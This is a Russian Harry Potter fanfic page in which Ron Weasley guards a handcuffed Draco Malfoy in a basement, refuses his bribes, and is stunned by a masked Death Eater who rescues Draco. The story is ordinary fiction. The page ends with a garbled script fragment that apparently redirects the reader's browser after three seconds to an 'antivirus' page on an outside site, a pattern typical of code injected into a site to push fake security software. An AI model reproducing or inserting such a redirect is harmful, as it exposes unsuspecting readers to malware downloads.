Пленник

Автор: Samantha (разрешение на архивацию получено)
Рейтинг: PG-13
Пейринг: RW/DM
Жанр: PWP
Саммари: Рон по понятным причинам ненавидит Драко, Драко же не испытывает по отношению к Рону абсолютно никаких чувств, он просто страшно устал и хочет покурить. Почему они оказались на складе и кто спас Драко, я не знаю и думать не хочу. На то оно и PWP.
Благодарности: спасибо Дэвиду Линчу за мое счастливое детство. Фик написан под впечатлением одного эпизода из сериала «Твин Пикс».
Посвящается Чеширочке и Aino Justice, здесь не обошлось без влияния вашей ролевки «Red Rose».

Казалось, погруженный во мрак Ист-энд мирно спит, убаюканный звоном дождевых капель о жестяные подоконники и завываниями холодного февральского ветра. Но в подвале старого склада все еще горел свет, хотя из-за деревянных щитов на окнах он и не пробивался наружу, в пахнущий бензином и сталью ночной воздух.

Здесь же, на нижнем этаже старого здания, стоял острый запах пыли, сырости и крыс. По потолку расплывались зеленоватые, словно трупные, пятна плесени, штукатурка местами осыпалась, обнажая красные кирпичные стены.

В дальнем углу, прикованный наручниками к веселого желтого цвета канализационной трубе, сидел не кто иной, как Драко Малфой. Его голова была безвольно опущена на грудь, когда-то идеально уложенные светлые волосы свисали на грязное лицо слипшимися прядями. Иногда он вздрагивал, оглядывался по сторонам и неминуемо упирался взглядом в единственного своего стражника. Напротив него на обыкновенной деревянной табуретке, с которой слезала краска, сидел Рон Уизли. Временами Рон закидывал ноги на стоящий перед ним стол и начинал раскачиваться на табурете, и тогда подвал оглашался пронзительным жалобным скрипом рассохшегося дерева.

От этого жуткого звука Драко снова вздрагивал и неприязненно морщился; он часто моргал – белый свет на кончике палочки Рона бил ему прямо в лицо.

Рон, насмешливо глядя в глаза слизеринцу, наклонил термос с кофе, и обжигающе горячий напиток полился в белый пластиковый стаканчик. Парень лениво отхлебнул.

– Эй ты, - хрипло начал Драко, - Уизли, ты бы мне хоть покурить дал.

– Я не курю, - улыбнулся Рон, - и тебе не советую. Поганая привычка, знаешь ли, Малфой. Врачи говорят…

– Да пошел ты! Какого черта вы меня здесь держите?

– Хотим, чтобы ты нам кое-что рассказал.

– Да кто вы, блин, такие?! Я понимаю, авроры…

– Какие авроры, Малфой? Из купленного тобой Министерства? Да и потом, ты не заслуживаешь, чтобы тебя держали в теплой уютной камере. Тебя просто поймали и посадили на цепь, как бешеную собаку. А вот когда ты расскажешь, что вы задумали, мы, может быть, и отпустим тебя…

Драко злобно плюнул в сторону Рона.

Тот только снова ухмыльнулся и причмокнул губами, смакуя великолепный черный кофе:

– А кофе-то хороший, крепкий такой…

Прикованный к трубе облизал пересохшие губы.

– Так ты дашь мне сигарету?

– Я уже сказал, курить вредно.

– А сидеть привязанным на холодном полу – полезно?! У меня уже вся задница затекла! И вообще, я хочу в туалет. И на воздух. И курить.

– Делай в штаны. Я не собираюсь тебя освобождать.

– Тогда хотя бы погаси эту свою гребаную палочку!

– Палочку? – Рон удивленно вскинул бровь, потом нахмурился, словно что-то обдумывая. На языке вертелось: «А что мне за это будет?». – Да ради Бога.

Он взял палочку в руки и направил свет прямо в глаза Малфою.

– Вот так, что ли?

– Погаси… я тебя прошу!

Рон вздохнул. Ну если ты так любезен… «Фините инкантатем», - пробормотал он себе под нос, огонек послушно погас. Драко снова облизнул губы и непроизвольно дернулся. Наручники глухо звякнули по толстой водопроводной трубе. Секунду спустя в ней гулко зашумело; видимо, кто-то на верхнем этаже спустил воду в бачке. Драко не то испуганно, не то просто удивленно посмотрел наверх.

– Забавно, - начал Рон, - вот ты там сидишь, а в дюйме от твоего носа проплыл кусок дерьма.

Драко недовольно поморщился.

– Хотя да, о чем это я, - продолжил Уизли, - ты сам и есть дерьмо, порядочное вонючее дерьмо.

– Эй ты, Уизли, - после небольшой паузы зашептал Малфой, - как там тебя… Рон, да? Рон, слушай, отпусти меня…

– Скажешь, что вы там задумали, отпущу.

– Слушай, - Драко хрипло закашлялся, - я скажу, а они меня того…

– Тебя и так того, - честно признался Рон. – Хотя я лично только рад буду.

– А ты отпусти, а я тебе заплачу, ведь ты бедн…

– Сколько? – спокойным голосом перебил его Уизли.

– Сколько хочешь? – Драко весь напрягся в своих наручниках. Несколько часов, проведенных на полу старого склада в компании сначала Поттера, а теперь Уизли, отзывались тупой, но сильной болью в позвоночнике и затылке.

А Рон в свою очередь смотрел в потолок, словно прикидывая, какую сумму содрать с Малфоя.

– Ну и сколько ты можешь мне дать? – он пытливо взглянул на Драко.

– Хм… тысячу галлеонов. Хочешь?

Рон только пожал плечами.

– Так дешево ценишь свою жизнь? Какая-то жалкая тысяча галлеонов? Малфой, а ты знаешь, сколько стоит хорошая гоночная метла?

Драко нахмурился.

– А я все лето проработал в магазине «Все для квиддича», и могу тебе авторитетно заявить, что хорошая – я подчеркиваю, очень хорошая – новая гоночная метла, сделанная на заказ, стоит восемьсот галлеонов. Так ты считаешь, что немного дороже какой-то там метлы?

– Ок, пять тысяч. Пять тысяч, слышишь?

– Пять тысяч… - задумчиво произнес Рон. – Ты умнеешь прямо таки на глазах. Но ночь у нас с тобой длинная, а мистер Люпин придет только утром, я думаю, мы успеем довести сумму эдак тысяч до ста пятидесяти, как тебе? Тем более какими темпами ты накидываешь…

– Ты, придурок рыжий, ты вообще знаешь, что такое пять тысяч галлеонов? Да ты отродясь таких денег в руках не держал, и, спорим, держать не будешь! Это же… пять тысяч… это…

– Ну давай, давай, объясни мне, что такое пять тысяч?

– Это очень большие деньги, Уизли, и они будут у тебя в руках, настоящие деньги, и тебе дам их я. Сейчас пойдем, и я тебе дам…

– Куда пойдем? Я никуда не пойду, а деньги сейчас давай.

– Уизли, - голосом человека, который объясняет в десятый раз для дебилов, начал Драко, - у меня с собой нет таких денег. И даже если б и были… у меня ж руки к батарее прикованы! Или хочешь сам меня обыскать? – он кокетливо улыбнулся. Рон только закатил глаза.

– Значит, посидишь до утра. Или пошли сову своему папочке, может, он привезет мои деньги.

– Папочке? – встрепенулся Драко, словно впервые за вечер вспомнил о существовании Люциуса. – Папочке?.. Слушай, Уизли, я дам тебе штуку, только за то, что ты пошлешь ему сову и скажешь, что я здесь…

Рон задумался.

– Ну давай же! В чем проблема?

– Так во мне уверен? Я ведь могу и не посылать никакой совы.

– Не пошлешь, денег тоже не увидишь, - отозвался Драко.

– Логично. Но, видишь ли, дело в том, что я не собираюсь посылать никакую сову.

– Почему? Деньги сразу получишь! Я ведь не прошу меня освободить, ты просто скажешь ему, где я, а я останусь здесь сидеть! Тебе даже делать-то толком ничего не надо, и никто ничего не узнает! Уизли, ты ничем не рискуешь, слышишь?

Лицо Драко раскраснелось от возбуждения, волосы еще больше слиплись от пота, парень, не переставая, облизывал губы.

– Две штуки, Уизли! Две штуки за одно гребаное письмо!

– Хорошо, - сказал Рон.

– Так ты согласен?!

– С чем?

– Ну как же, ты пошлешь сову…

– Какую сову, Малфой? Разве я сказал, что буду кому-то посылать сову? Я просто сказал «хорошо». Да и знаешь ли, неприлично людей по ночам беспокоить, совами будить. Вот ты представь – спишь ты с женой в обнимку…

– У меня нет жены, - мрачно вставил Драко.

– Без разницы. Ну так спишь ты со своей девушкой или с кем ты там спишь, а тут сова! Представляешь? Нехорошо получается. Или вам, Пожирателям, к такому не привыкать?

– Ты, заткнись, ты, ублюдок! Ты сам-то хоть знаешь, о чем…

– Не ори, Малфой, а то снова палочку зажгу.

– Скотина, - прошептал Драко и снова безвольно опустил голову на грудь. – Ты учти, что вас всех скоро прикончат, Лорд этого так не оставит…

– В первую очередь, солнце, прикончат тебя. Знаешь, что с тобой сделают твои так называемые друзья? Просто за то, что ты сейчас беседуешь со мной? Вряд ли ты сможешь убедить их, что не раскололся. А знаешь, что делают с предателями?

Драко внимательно посмотрел на него.

– Тебя сначала отделают Круциатусом по первое число, а потом скинут в Темзу, как паршивую собаку. Потом, конечно, денька через три твой хладный труп найдет какой-нибудь бомж. И все, не было никакого Драко Малфоя.

Драко уже собирался сказать очередную гадость, но ночной разговор был бесцеремонно прерван громким уверенным стуком в дверь. На нее каждый раз ставили мощные запирающие заклятия, причем каждый раз разные, поэтому открыть удобней было изнутри.

– Гарри, это ты? – Рон принялся искать ключ по карманам потрепанных джинсов.

– Я, я, - послышалось с той стороны двери.

Рон распахнул дверь…

– Ступефай! – и в глазах потемнело, он слабо пискнул и тяжело осунулся на бетонный пол.

Драко с изумлением посмотрел на своего спасителя, лицо которого было скрыто черной маской Пожирателя смерти.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>